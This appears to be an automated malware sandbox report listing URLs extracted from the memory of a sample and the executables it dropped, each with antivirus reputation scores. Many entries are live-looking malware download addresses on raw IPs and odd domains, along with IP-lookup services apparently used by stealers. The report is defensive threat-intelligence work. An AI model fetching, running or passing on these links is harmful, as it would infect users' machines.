                      https://www.sqlite.org/lang_corefunc.html0%Avira URL Cloudsafe
                      https://aka.ms/dotnet-core-applaunch?The0%Avira URL Cloudsafe
                      http://5.42.66.10/download/th/space.php#24%VirustotalBrowse
                      https://aka.ms/dotnet-core-applaunch?The1%VirustotalBrowse
                      https://t.me/copterwin0%Avira URL Cloudsafe
                      https://fleur-de-lis.sbs/post/File_294/setup294.exer0%Avira URL Cloudsafe
                      https://kurd.computer/dll/builddoc.exersaenh.dll0%Avira URL Cloudsafe
                      https://vk.com/doc5294803_669811786?hash=8bhjD7NgoJ7mZZEUFcsdZsXzzoRwkNFDlJU5B89faFX&dl=nQsFZJcLQzXn0%Avira URL Cloudsafe
                      http://85.192.56.26:80/api/bing_release.php:0%Avira URL Cloudsafe
                      https://ipinfo.io/widget/demo/8.46.123.175P0%Avira URL Cloudsafe
                      http://85.192.56.26/api/flash.php060%Avira URL Cloudsafe
                      http://5.42.66.10/download/th/getimage15.php100%Avira URL Cloudmalware
                      https://kurd.computer/dll/builddoc.exe100%Avira URL Cloudmalware
                      https://ipinfo.io/widget/demo/8.46.123.175X0%Avira URL Cloudsafe
                      http://147.45.47.149:54674/vape/niko.exephpX0%Avira URL Cloudsafe
                      http://85.192.56.26:80/api/flash.phpA0%Avira URL Cloudsafe
                      https://kurd.computer/dll/builddoc.exe2%VirustotalBrowse
                      http://85.192.56.26/api/bing_release.php100%Avira URL Cloudmalware
                      https://t.me/copterwin1%VirustotalBrowse
                      https://monoblocked.com:80/525403/setup.exe0%Avira URL Cloudsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                      https://vk.com:80/z0%Avira URL Cloudsafe
                      https://monoblocked.com/525403/setup.exexer0%Avira URL Cloudsafe
                      http://5.42.66.10/download/th/getimage15.php23%VirustotalBrowse
                      http://85.192.56.26/api/bing_release.php13%VirustotalBrowse
                      https://kurd.computer:80/dll/builddoc.exeu0%Avira URL Cloudsafe
                      https://monoblocked.com:80/525403/setup.exe15%VirustotalBrowse
                      https://vk.com:80/v0%Avira URL Cloudsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                      https://ipinfo.io/?0%Avira URL Cloudsafe
                      https://stats.vk-portal.net0%Avira URL Cloudsafe
                      http://176.111.174.109/pelikanf0%Avira URL Cloudsafe
                      https://vk.com/browser_reports?dest=default_reports0%Avira URL Cloudsafe
                      http://85.192.56.26/api/flash.phpt0%Avira URL Cloudsafe
                      https://st6-20.vk.com/css/al/common.cb94d05c.css0%Avira URL Cloudsafe
                      https://st6-20.vk.com/css/al/vkui.c63ec9ec.css0%Avira URL Cloudsafe
                      https://ipinfo.io/:0%Avira URL Cloudsafe
                      https://fleur-de-lis.sbs/r0%Avira URL Cloudsafe
                      http://85.192.56.26/api/flash.phpDat0%Avira URL Cloudsafe
                      https://db-ip.com:443/demo/home.php?s=8.46.123.1750%Avira URL Cloudsafe
                      https://ipinfo.io/namehttps://ipgeolocation.io/status0%Avira URL Cloudsafe
                      https://fleur-de-lis.sbs/z0%Avira URL Cloudsafe
                      https://steamcommunity.com/profiles/765611996897178990%Avira URL Cloudsafe
                      https://ipinfo.io/widget/demo/8.46.123.1750%Avira URL Cloudsafe
                      https://ipinfo.io:443/widget/demo/8.46.123.175c0%Avira URL Cloudsafe
                      https://monoblocked.com/525403/setup.exexe0%Avira URL Cloudsafe
                      http://185.172.128.159/dl.phpP0%Avira URL Cloudsafe
                      http://185.172.128.159/dl.phpO0%Avira URL Cloudsafe
                      https://ipinfo.io:443/widget/demo/8.46.123.175_0%Avira URL Cloudsafe
                      https://ipinfo.io/https://ipgeolocation.io/::0%Avira URL Cloudsafe
                      https://f.123654987.xyz/525403/setup.exeU100%Avira URL Cloudmalware
                      https://lop.foxesjoy.com/100%Avira URL Cloudmalware
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      https://steamcommunity.com/profiles/76561199689717899true
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtab_ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://147.45.47.149:54674/vape/niko.exeCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134495582.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138181954.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmptrue
                      • 15%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://duckduckgo.com/ac/?q=_ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://5.42.66.10/download/th/retail.phphpCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 7%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://lop.foxesjoy.com/RCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://login.vk.com/?act=logout&hash=b3a96a5acc0a409d0f&_origin=https%3A%2F%2Fvk.com&lrt=BDpxh3TFcrCHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=&rid=falsetrue%pLuLdluldeEpP%cA_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000000.2267358139.000000000118E000.00000080.00000001.01000000.0000000E.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://db-ip.com/Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016E3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://ns.microsoft.co2/t/Re_ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2424687708.0000000002B0B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://papi.vk.com/pushsse/ruimCHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.crEPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000000.2267358139.000000000118E000.00000080.00000001.01000000.0000000E.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://fleur-de-lis.sbs/p~CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://fleur-de-lis.sbs/jhgfdDCHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://lop.foxesjoy.com:80/ssl/crt.exeCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://85.192.56.26/api/flash.phpdow0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://vk.comCHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://vk.com/doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsECNfeCHA0VZiz8y.exe, 00000000.00000003.2189316455.00000000043C6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://vk.com:80/CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://fleur-de-lis.sbs/jhgfdCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://5.42.66.10/download/th/space.php#CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 24%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exeCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 21%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://kurd.computer/dll/builddoc.exeeCHA0VZiz8y.exe, 00000000.00000003.2140216516.00000000043F9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://aka.ms/dotnet-core-applaunch?framework=&framework_version=missing_runtime=true&arch=&rid=CHA0VZiz8y.exe, 00000000.00000003.2138600045.000000000441E000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2139765657.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138058247.0000000004B51000.00000004.00000020.00020000.00000000.sdmp, FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000000.2266954848.00007FF762EB9000.00000002.00000001.01000000.00000011.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://f.alie3ksggg.com/f/oiii.exeCHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 18%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://www.sqlite.org/lang_corefunc.htmlA_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://aka.ms/dotnet-core-applaunch?TheA_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://t.me/copterwinogoGQsWFwF_EcodN5qF7hiVC.exe, 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmp, zfQlIB6J8n2u_zLV5LHnA1xW.exe, 0000000C.00000002.2337447194.0000000004510000.00000004.00001000.00020000.00000000.sdmp, zfQlIB6J8n2u_zLV5LHnA1xW.exe, 0000000C.00000002.2317913229.0000000002260000.00000040.00001000.00020000.00000000.sdmp, zfQlIB6J8n2u_zLV5LHnA1xW.exe, 0000000C.00000002.2320846713.0000000004210000.00000040.00001000.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://kurd.computer/dll/builddoc.exersaenh.dllCHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://fleur-de-lis.sbs/post/File_294/setup294.exerCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://vk.com/doc5294803_669811786?hash=8bhjD7NgoJ7mZZEUFcsdZsXzzoRwkNFDlJU5B89faFX&dl=nQsFZJcLQzXnCHA0VZiz8y.exe, 00000000.00000003.2189316455.00000000043C6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://85.192.56.26:80/api/bing_release.php:CHA0VZiz8y.exe, 00000000.00000003.2061926794.00000000004A6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.innosetup.com/_rSi8sV87ppx0bgkbETdFbEZ.exe, 00000010.00000003.2273853174.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, _rSi8sV87ppx0bgkbETdFbEZ.exe, 00000010.00000003.2274149557.0000000001F48000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ipinfo.io/widget/demo/8.46.123.175P0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://85.192.56.26/api/flash.php060YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/ipJ9jGBSSbDD3yrTx79DzmOLls.exe, 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://5.42.66.10/download/th/getimage15.phpCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AB5000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 23%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://kurd.computer/dll/builddoc.exeCHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://ipinfo.io/widget/demo/8.46.123.175X0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://147.45.47.149:54674/vape/niko.exephpXCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://85.192.56.26:80/api/flash.phpA0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://85.192.56.26/api/bing_release.phpCHA0VZiz8y.exe, 00000000.00000003.2061680324.00000000004CA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 13%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://monoblocked.com:80/525403/setup.exeCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 15%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=_ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://vk.com:80/zCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://monoblocked.com/525403/setup.exexerCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://kurd.computer:80/dll/builddoc.exeuCHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://vk.com:80/vCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
